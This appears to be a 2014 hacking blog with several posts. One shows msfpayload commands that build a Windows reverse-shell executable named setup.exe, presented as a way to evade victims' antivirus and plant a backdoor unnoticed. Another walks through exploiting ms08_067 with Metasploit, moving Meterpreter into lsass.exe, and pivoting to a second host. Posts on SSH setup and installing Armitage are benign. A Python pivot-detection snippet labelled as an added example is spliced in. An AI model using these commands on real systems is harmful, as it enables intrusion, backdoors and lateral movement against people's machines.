Wednesday 23 April 2014

Payload undetectable For Multi Computer

Step 1: Explore Msfpayload
Let's start by exploring msfpayload as part of the Metasploit suite. By typing msfpayload with the -h switch, we can get the help screen on this module.

msfpayload -h

Notice in the screenshot above that the syntax for this module includes options, the payload, and then several values that enable us to encode the payload using various programming languages including C, Perl, Ruby, Raw, VBA and others.
Msfpayload enables us to convert the code of the payload into any of these choices and thereby better evade the victim’s AV software.

Step 2: Generate a Custom Payload

Let’s proceed to generate a customized payload in C.

msfpayload windows/shell/reverse_tcp -o

Notice that we used the -o option and Metasploit displays our various options. To generate the customized payload we need to pass the options to Metasploit, in this case the LHOST and the LPORT. Let's set the LHOST to our machine, 192.168.100.1, and the LPORT to 4441.

We now need to generate a custom payload in C by typing:

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 LPORT=4441 C

Notice that we appended the command with a capital C to indicate that we wanted the payload to be generated in C. As you can see from the screenshot above, Metasploit generated the payload in C and displayed it to us.

Step 3: Generate the Binary Code

Finally, we need to generate a binary executable for the shellcode, which we can use in our client-side attack.

msfpayload windows/shell/reverse_tcp LHOST=192.168.100.1 X > setup.exe

We have now created an executable file by using the X option, sent this file to the current folder and named it setup.exe. We can now use this new payload in a client-side attack and the victim's AV software will be unlikely to have a signature for it, allowing us to stealthily place this backdoor/listener on their system.

And that's it! Stay tuned for my next lesson, where we'll explore ways to disable the client AV software altogether.

Monday 21 April 2014

How to Install SSH in Ubuntu

Steps

  1. First install SSHD (secure shell daemon) and client. Type in the following commands in a terminal session:
    sudo apt-get install openssh-server openssh-client
  2. Test your installation by connecting to your own server. Type in the following command:
    ssh localhost
    or
    ssh your-username@your-server-ip-address
  3. Basically you connect to your SSH server by knowing three things: 1) your domain name or ip address, 2) your username, and 3) your password.
  4. If you are using another remote Linux terminal to connect to your SSH server you will type the following terminal commands:
    ssh -l your-username your-server-domain.name-or-ipaddress
    example: ssh -l dan somedomain.com
    or
    example: ssh dan@somedomain.com
  5. If you are using a program like PuTTY in Windows to connect to your SSH server you will need to fill in your domain name or ip address and click "Open", after which you will be prompted for your username and password.   
  6. The terminal commands to start, stop and restart your sshd server are:
    sudo /etc/init.d/ssh start
    sudo /etc/init.d/ssh stop
    sudo /etc/init.d/ssh restart

Troubleshooting

If you are having problems connecting to your SSH server from another remote computer it may be a firewall issue. By default SSH accepts connections on port 22, so you will have to make sure port 22 is open on your Linux computer, and if you are connecting from another network that port forwarding for port 22 is enabled on your local router/firewall device as well.

Metasploit Attack on Another Network

Pivoting refers to the practice of hacking a network computer or server and then using that host to attack other computer systems from within the network. By launching attacks from within the network, the attacker bypasses firewall policy and can execute attacks that would not be possible from outside the network. By using a compromised system to launch attacks from, the attacker has an improved prospect of remaining undetected and can leave less of a fingerprint.

Exploit:
In the example pentest below, the goal is to exploit a host on the network and establish a hidden Meterpreter session, then, using pivoting, exploit another host on the network.

Requirements:
The pentest exercise was conducted with the Backtrack5 VMware virtual machine against two hosts running Windows XP Pro Service Pack 2.

Exploit steps:

Open a terminal in Backtrack and enter the following commands:

#msfconsole
msf > show exploits
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
     PAYLOAD => windows/meterpreter/bind_tcp
msf exploit (ms08_067_netapi) > show options
msf exploit (ms08_067_netapi) > set RHOST <1st victim's ip address>
     RHOST => <ip address>
msf exploit (ms08_067_netapi) > exploit        //if you are successful, you will see a meterpreter prompt
meterpreter >                    //if you see this you have a Meterpreter shell
meterpreter > shell           //this will give you a Windows command prompt/shell
C:\WINDOWS\system32> exit             //exit out of the Windows command prompt
meterpreter > getpid                 //note the process id that Meterpreter is using
meterpreter > ps              //list all running processes on the victim machine. What process does your PID show up as? svchost.exe? Look for the process "lsass.exe"; it may show up as PID 700
meterpreter > migrate 700           //migrate Meterpreter to the lsass.exe process
meterpreter > getpid                     //verify your new process ID
ctrl+z                             //Key in ctrl+z to background the Meterpreter session
msf > route add <2nd victim's ip address> <subnet mask> <session id #>           //route a new attack to victim 2
msf > use windows/smb/ms08_067_netapi
msf exploit (ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
msf exploit (ms08_067_netapi) > set RHOST <2nd victim's ip address>
msf exploit (ms08_067_netapi) > exploit
meterpreter >                           //success!!!!

Now that you have a meterpreter shell the sky is the limit. Run the help command to see all of the commands available to you. Try creating a directory or file on the victim machine, or uploading or downloading a file to and from the victim. Here are some of the basic meterpreter commands:

     meterpreter > help                     //help menu
     meterpreter > background               //backgrounds the current session
     meterpreter > exit                     //terminate the meterpreter session
     meterpreter > quit                     //terminate the meterpreter session
     meterpreter > write                    //writes data to a channel
     meterpreter > mkdir                    //creates a directory
     meterpreter > download                 //download a file or directory
     meterpreter > upload                   //upload a file or directory
     meterpreter > search                   //search for a file
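From the defender's side, the pivot described above leaves a trace: once the second attack is routed through the Meterpreter session, the SMB exploit traffic to victim 2 originates from victim 1. The following Python is an added example, not code from the original post; it flags that two-hop SMB pattern in a small constructed flow log, and the log format and all addresses in it are assumptions.

```python
"""Added example, not from the original post: spotting the pivot above from
the network side. Routing the second attack through the Meterpreter session
means the SMB traffic to victim 2 originates from victim 1, i.e. a two-hop
chain A -> B:445 then B -> C:445. Log format and addresses are constructed."""
from datetime import datetime, timedelta
import ipaddress

SMB_PORT = 445

# Constructed flow log: "<ISO timestamp> <src> <dst> <dst_port>". 192.168.1.9
# stands in for the Backtrack VM, the 10.0.0.x hosts for the Windows XP boxes;
# 4444 is the bind_tcp listener the attacker connects to after exploitation.
FLOWS = """\
2014-04-21T10:00:00 192.168.1.9 10.0.0.20 445
2014-04-21T10:00:07 192.168.1.9 10.0.0.20 4444
2014-04-21T10:03:10 10.0.0.20 10.0.0.30 445
2014-04-21T10:03:15 10.0.0.20 10.0.0.31 445
2014-04-21T09:00:00 10.0.0.5 10.0.0.10 445
"""

def parse_flows(text):
    """Parse the log into (time, src, dst, port) tuples, oldest first."""
    rows = []
    for line in text.splitlines():
        ts, src, dst, port = line.split()
        rows.append((datetime.fromisoformat(ts), ipaddress.ip_address(src),
                     ipaddress.ip_address(dst), int(port)))
    return sorted(rows, key=lambda r: r[0])

def find_smb_chains(flows, window=timedelta(minutes=30)):
    """Return (first_src, pivot, target) triples: hosts that received an
    inbound SMB connection and then opened SMB to other hosts within `window`.
    Client -> file server -> DC hops can match too; allowlist known servers."""
    last_inbound = {}  # host -> (time, source) of its most recent inbound SMB
    chains = []
    for ts, src, dst, port in flows:
        if port != SMB_PORT:
            continue
        if src in last_inbound:
            hit_ts, hit_src = last_inbound[src]
            if hit_src != dst and ts - hit_ts <= window:
                chains.append((str(hit_src), str(src), str(dst)))
        last_inbound[dst] = (ts, src)
    return chains

if __name__ == "__main__":
    for first_src, pivot, target in find_smb_chains(parse_flows(FLOWS)):
        print(f"possible pivot: {first_src} -> {pivot} -> {target}")
```

The single 10.0.0.5 to 10.0.0.10 connection is not reported because nothing reached 10.0.0.5 over SMB first; only the host that was exploited and then turned into an SMB client is flagged.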

Tuesday 1 April 2014

How do I run Armitage on Kali Linux?

1. How do I run Armitage on Kali Linux?

Armitage is not distributed with Kali Linux. It is in the Kali Linux repository though. To install it, type:
apt-get install armitage

2. I get a database error on Kali Linux. How do I fix it?

Make sure the database is running. Use:
service postgresql start
Next, you may need to ask Kali to recreate the Metasploit framework database:
service metasploit start 
service metasploit stop
Sometimes you need to do the above after an msfupdate as well.

3. Sometimes Armitage's menus stick (or I see graphic glitches)--how do I fix this?

Kali Linux comes with Java 1.6 and 1.7 pre-installed. Unfortunately, it defaults to Java 1.6 which has a few issues. You'll need to tell Kali Linux to use Java 1.7 by default. Here's how:
32-bit Kali Linux:
update-java-alternatives --jre -s java-1.7.0-openjdk-i386
64-bit Kali Linux:
update-java-alternatives --jre -s java-1.7.0-openjdk-amd64